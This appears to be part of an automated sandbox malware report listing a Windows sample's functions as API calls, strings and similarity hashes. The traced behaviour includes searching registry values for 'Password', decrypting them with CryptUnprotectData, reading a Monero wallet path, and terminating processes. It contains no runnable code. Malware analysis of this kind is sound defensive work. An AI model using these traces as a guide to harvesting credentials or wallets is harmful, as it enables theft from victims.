                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,006B4F39), ref: 006C4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C454C
                                • wsprintfW.USER32 ref: 006C455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006C45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006C45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 006C45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9Ok$%hs$9Ok
                                • API String ID: 885711575-1615165456
                                • Opcode ID: 7189af8b71185dca4cdc5cac0be40075a5b8337fc3a433bebaa1b9197295ff56
                                • Instruction ID: f9bb0378ff58a35d34500b534a66e8d0f4385e5676bf2b68fa5cbe2152b725e0
                                • Opcode Fuzzy Hash: 7189af8b71185dca4cdc5cac0be40075a5b8337fc3a433bebaa1b9197295ff56
                                • Instruction Fuzzy Hash: EB313E72A41209BBEB10DBE4DC45FEE7779FF45700F10415AFA05A7180EF70AA458BA5
                                Function 006ABBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ABC1F
                                • lstrlen.KERNEL32(00000000), ref: 006ABC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ABC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ABC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ABCAC
                                • lstrlen.KERNEL32(006D4AD4), ref: 006ABD23
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: b89e7bfad68254a8e7078bb7ec8ac3f21a07944d716c4bc51202d03853f6b9b4
                                • Instruction ID: d0371e746d9cc7d59fc500247fd4a80e377c8cb04d99d30b98b2bd87c093924b
                                • Opcode Fuzzy Hash: b89e7bfad68254a8e7078bb7ec8ac3f21a07944d716c4bc51202d03853f6b9b4
                                • Instruction Fuzzy Hash: D9A18F70A012068FCB61FF29D959AAEB7B2BF46304F18916DE40A97362DB35DC41CF54
                                Function 006C5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 006C6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 006C609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: e637eda9c4e87fa9df4233651ef6afd6cb27d22c813625ad420d44a43a3abff0
                                • Instruction ID: 70a3e98368b5d0ff50b2b215b6af473e9b88a00e4e6416ebd6ab3c4e0f1096f3
                                • Opcode Fuzzy Hash: e637eda9c4e87fa9df4233651ef6afd6cb27d22c813625ad420d44a43a3abff0
                                • Instruction Fuzzy Hash: 3D616B70B00644DBDB18CF5CCD95E7EB3B7EB84304B244A5DE4929B781D631AD818B99
                                Function 006BE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE07D
                                • lstrcat.KERNEL32(?,?), ref: 006BE098
                                • lstrcat.KERNEL32(?,?), ref: 006BE0AC
                                • lstrcat.KERNEL32(?,0132A788), ref: 006BE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006BE0D4
                                • lstrcat.KERNEL32(?,0133DB20), ref: 006BE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BE126
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 3dac2071ab2296a911068fbad28510ddf6733617c5f9abdecc52b5216a1881fe
                                • Instruction ID: 6242d0ba8fa84764f4d0dd43ca32b443483abd98c91e9977f97035716118d2cf
                                • Opcode Fuzzy Hash: 3dac2071ab2296a911068fbad28510ddf6733617c5f9abdecc52b5216a1881fe
                                • Instruction Fuzzy Hash: FC41B2B191111CEBCB65FB68DC58ADD73B6BF48300F144AA9F64A93251EB309F858F90
                                Function 006A7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006A7805
                                  • Part of subcall function 006A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006A784A
                                  • Part of subcall function 006A77D0: StrStrA.SHLWAPI(?,Password), ref: 006A78B8
                                  • Part of subcall function 006A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A78EC
                                  • Part of subcall function 006A77D0: HeapFree.KERNEL32(00000000), ref: 006A78F3
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006A7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 006A7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 006A7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 006A7AF0
                                • wsprintfA.USER32 ref: 006A7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A7B47
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006A7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: 9dfdcc584a28a56cd13467cb40b9b2ca373966c4e594968120129d2b373b0fc5
                                • Instruction ID: 773f3a38a94263f66fe5022adae4f6a5101237fc7e9753937526b21ca6e47732
                                • Opcode Fuzzy Hash: 9dfdcc584a28a56cd13467cb40b9b2ca373966c4e594968120129d2b373b0fc5
                                • Instruction Fuzzy Hash: 983162B2A05614EFCB10EF68DC459ABB77AFB85700F19465AE94A93310DB70ED41CFA0
                                Function 006B81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8243
                                • lstrlen.KERNEL32(00000000), ref: 006B8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8297
                                • lstrlen.KERNEL32(00000000), ref: 006B82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B82EB
                                • lstrlen.KERNEL32(00000000), ref: 006B8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8337
                                • lstrlen.KERNEL32(00000000), ref: 006B8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B8380
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c257b2a643ea20296e6ce75354a548ced145a540a11b575ba3954679f58f864d
                                • Instruction ID: ed0d246d87892cd471f210df6c6ab0b42b46dd552b9b6d1cb5eac33f82c1e090
                                • Opcode Fuzzy Hash: c257b2a643ea20296e6ce75354a548ced145a540a11b575ba3954679f58f864d
                                • Instruction Fuzzy Hash: 0C515BB1A016129FDB14EF69D858AAAB7EAFF41740F114518AD06DB345EF30ED90CBE0
                                Function 006A77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006A7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 006A784A
                                • StrStrA.SHLWAPI(?,Password), ref: 006A78B8
                                  • Part of subcall function 006A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 006A775E
                                  • Part of subcall function 006A7750: RtlAllocateHeap.NTDLL(00000000), ref: 006A7765
                                  • Part of subcall function 006A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006A778D
                                  • Part of subcall function 006A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006A77AD
                                  • Part of subcall function 006A7750: LocalFree.KERNEL32(?), ref: 006A77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A78EC
                                • HeapFree.KERNEL32(00000000), ref: 006A78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 006A7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: b2b2afc7379e8df12ae423ab9b39368542bfb954a38445a6b6683550ea02966b
                                • Instruction ID: 504a6e83c171600968d25da01e75c5d4a38a8807e4390f2961708489045ee7a6
                                • Opcode Fuzzy Hash: b2b2afc7379e8df12ae423ab9b39368542bfb954a38445a6b6683550ea02966b
                                • Instruction Fuzzy Hash: 72712EB1D0021DAFDB10DF95DC84AEEB7B9FF45300F14456AE609A7200EA35AE85CF94
                                Function 006A1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006A1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006A1173
                                • RegCloseKey.ADVAPI32(?), ref: 006A117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 006A114F
                                • wallet_path, xrefs: 006A116D
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 6198e28d51a7ce2071d94b1b0c10c980dc68dc2d47eeb8687b0a93953a1b8db8
                                • Instruction ID: af0191bd66943c1d2d41183e755e25c110fd55a221d8e2bd68f07f9db2b21783
                                • Opcode Fuzzy Hash: 6198e28d51a7ce2071d94b1b0c10c980dc68dc2d47eeb8687b0a93953a1b8db8
                                • Instruction Fuzzy Hash: D1F01D75A41208FBE710ABA0AC4DEEA7B7DEB05715F100256FE05E6290EAB05E448BA0
                                Function 006A9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 006A9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 006A9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 006A9EA7
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • lstrcpy.KERNEL32(00000000,006D4C48), ref: 006A9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 5fc4f9ea3e056d7260cba251e0656d5be0fc52cfc4b97cafd8779aa45673e526
                                • Instruction ID: c082ccbe949225669918dc975f45df36906a93bc93209b2b8ced6e9998b13c93
                                • Opcode Fuzzy Hash: 5fc4f9ea3e056d7260cba251e0656d5be0fc52cfc4b97cafd8779aa45673e526
